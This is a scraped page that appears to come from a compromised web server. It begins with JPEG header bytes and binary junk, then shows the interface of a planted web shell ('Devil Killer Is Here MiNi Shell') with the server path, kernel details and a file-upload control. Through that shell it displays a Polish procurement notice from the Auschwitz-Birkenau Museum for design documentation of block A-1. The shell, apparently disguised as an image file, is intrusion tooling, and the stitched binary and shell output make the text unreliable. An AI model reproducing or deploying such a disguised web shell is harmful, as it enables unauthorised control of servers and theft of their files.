JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220926/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220926/0036365501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonanie dokumentacji proj.-koszt. remontu i przebudowy <br/>wraz z programem prac konserw. bloku o numerze inw. A-1 usytuowanego na terenie PMAB w Oświęcimiu <br/>oraz pełnienie nadzoru autorskiego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276015</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Więźniów Oświęcimia 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@auschwitz.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.auschwitz.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonanie dokumentacji proj.-koszt. remontu i przebudowy <br/>wraz z programem prac konserw. bloku o numerze inw. A-1 usytuowanego na terenie PMAB w Oświęcimiu <br/>oraz pełnienie nadzoru autorskiego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b922fe4-380f-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00363655</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00056226/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 Wykonanie dokumentacji projektowo - kosztorysowej remontu i przebudowy zabytkowego bloku murowanego o numerze inwentaryzacyjnym A-1 usytuowanego na terenie PMAB w Oświęcimiu, w zespole dawnego...</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.auschwitz.org/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.1	Złożenie oferty, oferty dodatkowej (jeżeli Zamawiający będzie prowadził negocjacje) oraz jej wycofanie oraz zmiana odbywa się przy użyciu miniPortalu zamieszczonego na stronie internetowej https://miniportal.uzp.gov.pl/ System miniPortal szyfruje i deszyfruje oferty.<br/>1.2	Komunikacja w pozostałym zakresie będzie odbywać się przy użyciu poczty elektronicznej na adres: przetargi@auschwitz.org.<br/>2.	Ofertę, ofertę dodatkową (jeżeli Zamawiający będzie prowadził negocjacje) wraz z oświadczeniem z art. 125 ust. 1 Pzp oraz oświadczenie, o którym mowa w art. 117 ust. 4 Pzp składa się pod rygorem nieważności <br/>zgodnie z wyborem Wykonawcy w formie elektronicznej (oznacza to postać elektroniczną opatrzoną <br/>kwalifikowanym podpisem elektronicznym), lub w postaci elektronicznej opatrzonej podpisem zaufanym <br/>lub podpisem osobistym.<br/>3.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych składających się na ofertę ewentualną ofertę dodatkową oraz jej wycofanie oraz zmiana opisane zostały w Instrukcji <br/>korzystania z miniPortalu zamieszczonej na stronie: <br/>https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf <br/>Złożenie oferty jest jednoznaczne z zaakceptowaniem przez wykonawcę Regulaminu miniPortalu oraz Warunków korzystania z elektronicznej platformy usług administracji publicznej(ePUAP) znajdujących się pod adresami: https://miniportal.uzp.gov.pl/WarunkiUslugi i https://www.gov.pl/web/gov/warunki-korzystania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula RODO znajduje się w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula RODO znajduje się w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu dokumentacji projektowo - kosztorysowej remontu i przebudowy wraz z programem prac konserwatorskich bloku o numerze inwentaryzacyjnym A-1 usytuowanego na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu, zwanej dalej „Dokumentacją” oraz pełnienie nadzoru autorskiego, w podziale na etapy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Aktualizacja szczegółowego kosztorysu inwestorskiego konserwatorskiego i szczegółowego kosztorysu inwestorskiego budowlanego. W ramach przedmiotu umowy Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej: <br/>1.5.1.	Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać.<br/>1.5.2.	Wykonawca, w terminie 21 dni od daty otrzymania wezwania zobowiązany jest do sporządzenia aktualizacji szczegółowego kosztorysu inwestorskiego konserwatorskiego i szczegółowego kosztorysu inwestorskiego budowlanego na rzecz postępowania o udzielenie zamówienia prowadzonego w trybie Pzp na wykonanie robót budowlanych i prac konserwatorskich w oparciu o opracowaną przez Wykonawcę Dokumentację.<br/>1.5.3.	Wykonawca dostarczy Zamawiającemu aktualizację kosztorysów w formatach i na zasadach określonych w Umowie analogicznie jak dla kosztorysów wchodzących w skład zamówienia podstawowego.<br/>1.5.4.	Wezwanie Zamawiającego może być wystosowane jeden raz w okresie świadczenia <br/>przez Wykonawcę nadzoru autorskiego.<br/>1.5.5.	Usługa w ramach Opcji musi zostać wykonana przez osoby wskazane w Załącznikach nr 6 do Umowy będącym Załącznikiem nr 9 do SWZ jako osoby przedstawione na potwierdzenie warunków udziału w postepowaniu i dla wykazania kryteriów oceny ofert.<br/>1.5.6.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego.<br/>1.5.7.	Uruchomienie opcji nie będzie wymagało zmiany umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">336 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.1.	Zamawiający wymaga aby Wykonawca w okresie ostatnich siedmiu (7) lat przed upływem terminu <br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał: <br/>3.1.1.	minimum jedną wielobranżową dokumentację projektowo - kosztorysową remontu <br/>lub przebudowy budynku wpisanego do rejestru zabytków, o powierzchni użytkowej nie <br/>mniejszej niż 400m2;<br/>3.1.2.	minimum jedną wielobranżową dokumentację projektowo - kosztorysową remontu <br/>lub przebudowy budynku wpisanego do rejestru zabytków, o wartości minimum 250 000 zł brutto.<br/>3.2.	Zamawiający wymaga aby Wykonawca w okresie ostatnich siedmiu (7) lat przed upływem terminu <br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał, co najmniej 2 programy prac konserwatorskich dla obiektów budowlanych (lub ich części) wpisanych do rejestru zabytków lub inwentarza muzeum będącego instytucją kultury, z zastrzeżeniem, że:<br/>3.2.1.	w ramach obu w/w programów prac konserwatorskich zostały opracowane następujące zakresy łącznie: nawarstwienia malarskie, stolarka okienna lub drzwiowa, wątek ceglany;<br/>3.2.2.	wartość jednego z w/w programów była nie mniejsza niż 30 000 zł brutto. <br/>3.3.	Zamawiający wymaga, aby Wykonawca dysponował, co najmniej:<br/>3.3.1.	jedną osobą posiadającą uprawnienia projektowe bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniające do projektowania <br/>oraz doświadczenie polegające na:<br/>a)	wykonaniu po dniu uzyskania uprawnień, w okresie ostatnich 7 lat przed upływem terminu składania ofert, minimum 1 dokumentacji projektowej remontu lub przebudowy obiektu <br/>budowlanego wpisanego do rejestru zabytków, <br/>b)	projektowaniu w powyższej specjalności przez łączny okres minimum 3 lat, po dniu uzyskania uprawnień,<br/>3.3.2.	jedną osobą posiadającą uprawnienia projektowe bez ograniczeń w specjalności <br/>architektonicznej lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniające do projektowania oraz doświadczenie polegające na:	<br/>a)	wykonaniu po dniu uzyskania uprawnień, w okresie ostatnich 7 lat przed upływem terminu składania ofert minimum 1 dokumentacji projektowej remontu lub przebudowy obiektu <br/>budowlanego wpisanego do rejestru zabytków, <br/>b)	projektowaniu w powyższej specjalności przez łączny okres minimum 3 lat, po dniu uzyskania uprawnień,<br/>3.3.3.	jedną osobą posiadającą uprawnienia projektowe bez ograniczeń w specjalności instalacyjnej <br/>w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej <br/>obowiązujących przepisów, upoważniające do projektowania oraz doświadczenie polegające na:<br/>a)	wykonaniu po dniu uzyskania uprawnień, w okresie ostatnich 7 lat przed upływem terminu składania ofert minimum 2 dokumentacji projektowych branży elektrycznej dotyczących <br/>budynku wpisanego do rejestru zabytków,<br/>3.3.4.	jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności <br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, <br/>wodociągowych i kanalizacyjnych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniających <br/>do projektowania oraz doświadczeniem polegającym na:<br/>a)	wykonaniu po dniu uzyskania ww. uprawnień, w okresie ostatnich 7 lat <br/>przed upływem terminu składania ofert, minimum 2 dokumentacji projektowych dotyczących budynku wpisanego do rejestru zabytków,<br/>3.3.5.	jednym konserwatorem zabytków, który posiada, co najmniej: <br/>a)	tytuł zawodowy magistra w specjalizacji konserwacja malarstwa lub malarstwa <br/>i rzeźby polichromowanej,<br/>b)	minimum 2 letnie (licząc od momentu uzyskania dyplomu magistra) doświadczenie <br/>zawodowe (rozumiane jako suma przepracowanych miesięcy) w zakresie realizacji prac <br/>konserwatorskich przy zabytkach ruchomych lub nieruchomych wpisanych <br/>do rejestru zabytków lub inwentarza muzeum będącego instytucją kultury, <br/>c)	minimum 12 miesięcy doświadczenia zawodowego (rozumianych jako suma przepracowanych miesięcy) w kierowaniu pracami konserwatorskimi w zabytkach nieruchomych wpisanych do rejestru zabytków lub inwentarza muzeum będącego instytucją kultury,<br/>d)	doświadczenie zawodowe obejmujące opracowanie minimum 2 programów prac <br/>konserwatorskich dla zabytków nieruchomych wpisanych do rejestru zabytków <br/>lub inwentarza muzeum będącego instytucją kultury – każdy program konserwatorski winien obejmować co najmniej konserwację nawarstwień malarskich ściennych,<br/>3.3.6.	jednym konserwatorem zabytków, który posiada:<br/>a)	tytuł zawodowy magistra w specjalności związanej z konserwacją materiałów mineralnych (np. konserwacja i restauracja rzeźby lub konserwacja elementów i detali architektonicznych lub konserwacja i restauracja rzeźby kamiennej i elementów architektury),<br/>b)	minimum 2 letnie (licząc od momentu uzyskania dyplomu magistra ) doświadczenie zawodowe (rozumiane jako suma przepracowanych miesięcy) w realizacji prac konserwatorskich dotyczących konserwacji materiałów mineralnych lub drewna lub metalu w zabytkach <br/>ruchomych lub nieruchomych wpisanych do rejestru zabytków lub inwentarza muzeum będącego instytucją kultury,<br/>c)	minimum 12 miesięcy doświadczenia zawodowego (rozumianych jako suma <br/>przepracowanych miesięcy) w kierowaniu pracami konserwatorskimi w zakresie ww. <br/>materiałów w zabytkach ruchomych lub nieruchomych wpisanych do rejestru zabytków <br/>lub inwentarza muzeum będącego instytucją kultury, <br/>d)	doświadczenie zawodowe obejmujące wykonanie minimum 2 programów prac <br/>konserwatorskich dla zabytków nieruchomych wpisanych do rejestru zabytków <br/>lub inwentarza muzeum będącego instytucją kultury, w tym: minimum 1 program powinien dotyczyć konserwacji wątku ceglanego.<br/>3.3.7.	Jedna osoba może wykazać spełnienie więcej niż jednego z warunków, o których mowa w pkt 3.3.1 do 3.3.6., z zastrzeżeniem jak w pkt 3.3.8. c).<br/>3.3.8.	Doświadczenie osób opisanych w pkt. 3.3.1 do 3.3.6 powyżej, należy podać w datach dziennych (przykładowo: od 1 marca 2016 r. do 31 grudnia 2017r.), przy czym: <br/>a)	Zamawiający informuje, iż ilość przepracowanych dni, która będzie wynikać z dat dziennych wskazanych przez Uczestnika będzie dzielona przez 30 i w ten sposób będzie wyliczana liczba przepracowanych miesięcy.<br/>b)	Przez projektowanie w danej specjalności przez łączny okres minimum 3 lat po dniu uzyskania uprawnień rozumie się wykonanie po uzyskaniu uprawnień zamówień obejmujących <br/>minimum wykonanie projektu budowlanego zatwierdzonego ostatecznym pozwoleniem <br/>na budowę. Łączny czas wykonywania powyższych zamówień musi wynosić minimum 3 lata, liczonych jako suma miesięcy trwania poszczególnych zamówień. W przypadku wykonywania kilku zamówień w jednym czasie, miesiące pokrywające się nie podlegają sumowaniu. <br/>c)	Wymagane doświadczenie zawodowe konserwatorów wskazane w punkcie 3.3.5. b) i c) <br/>oraz w punkcie 3.3.6 b) i c) nie mogą być wykonywane w tym samym okresie czasu i nie <br/>zwielokrotniają się, co oznacza, że w jednym okresie czasu jedna osoba może wykazać tylko jeden rodzaj doświadczenia tj. 3.3.5 b) albo 3.3.5 c) i analogicznie: 3.3.6 b) albo 3.3.6 c). <br/>3.4.	Na potrzeby oceny spełnienia warunków udziału: <br/>3.4.1.	Przez dokumentację projektowo - kosztorysową rozumie się dokumentację opracowaną w zakresie określonym obowiązującymi przepisami prawa w chwili jej opracowania i obejmującą minimum: <br/>a)	projekt budowlany w zakresie niezbędnym do uzyskania pozwolenia na budowę, <br/>b)	projekt wykonawczy,<br/>c)	specyfikacje wykonania i odbioru robót, <br/>d)	przedmiar i kosztorys inwestorski.<br/>3.4.2.	Przez dokumentację projektową rozumie się dokumentację opracowaną <br/>w zakresie określonym obowiązującymi przepisami prawa w chwili jej opracowania <br/>i obejmującą minimum: <br/>a)	projekt budowlany w zakresie niezbędnym do uzyskania pozwolenia na budowę, <br/>b)	projekt wykonawczy, <br/>3.4.3.	Przez obiekt lub budynek wpisany do rejestru zabytków Zamawiający rozumie obiekt <br/>lub budynek wpisany do rejestru zabytków w rozumieniu Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami lub analogicznego do rejestru zabytków <br/>sposobu ochrony zabytków prowadzonego przez organy ustanowione w tym celu <br/>w państwach obcych.<br/>3.4.4.	Przez wykonanie dokumentacji projektowo - kosztorysowej lub dokumentacji projektowej dotyczącej remontu lub przebudowy budynku rozumie się pełnienie roli projektanta w danej branży w dokumentacji.<br/>3.5.	Projektanci powinni posiadać uprawnienia budowlane zgodnie z obecnie obowiązującym Prawem <br/>budowlanym oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały <br/>wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również <br/>wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. <br/>o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65).<br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum/spółka cywilna) warunki udziału w postępowaniu, określone w Dziale V pkt 3 SWZ, zostaną spełnione, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia spełni warunki udziału w postępowaniu dotyczące zdolności technicznej i zawodowej, o których mowa Dziale V pkt 3 SWZ.<br/>4.1.	Wykonawcy wspólnie ubiegający się o zamówienie (konsorcjum, spółka cywilna) dołączają do oferty oświadczenie*, op.w art. 117 u.4 pzp <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do niniejszego postępowania jest zobowiązany wnieść wadium o wartości 5 000,00 zł (słownie: pięć tysięcy złotych) na czas związania ofertą. <br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 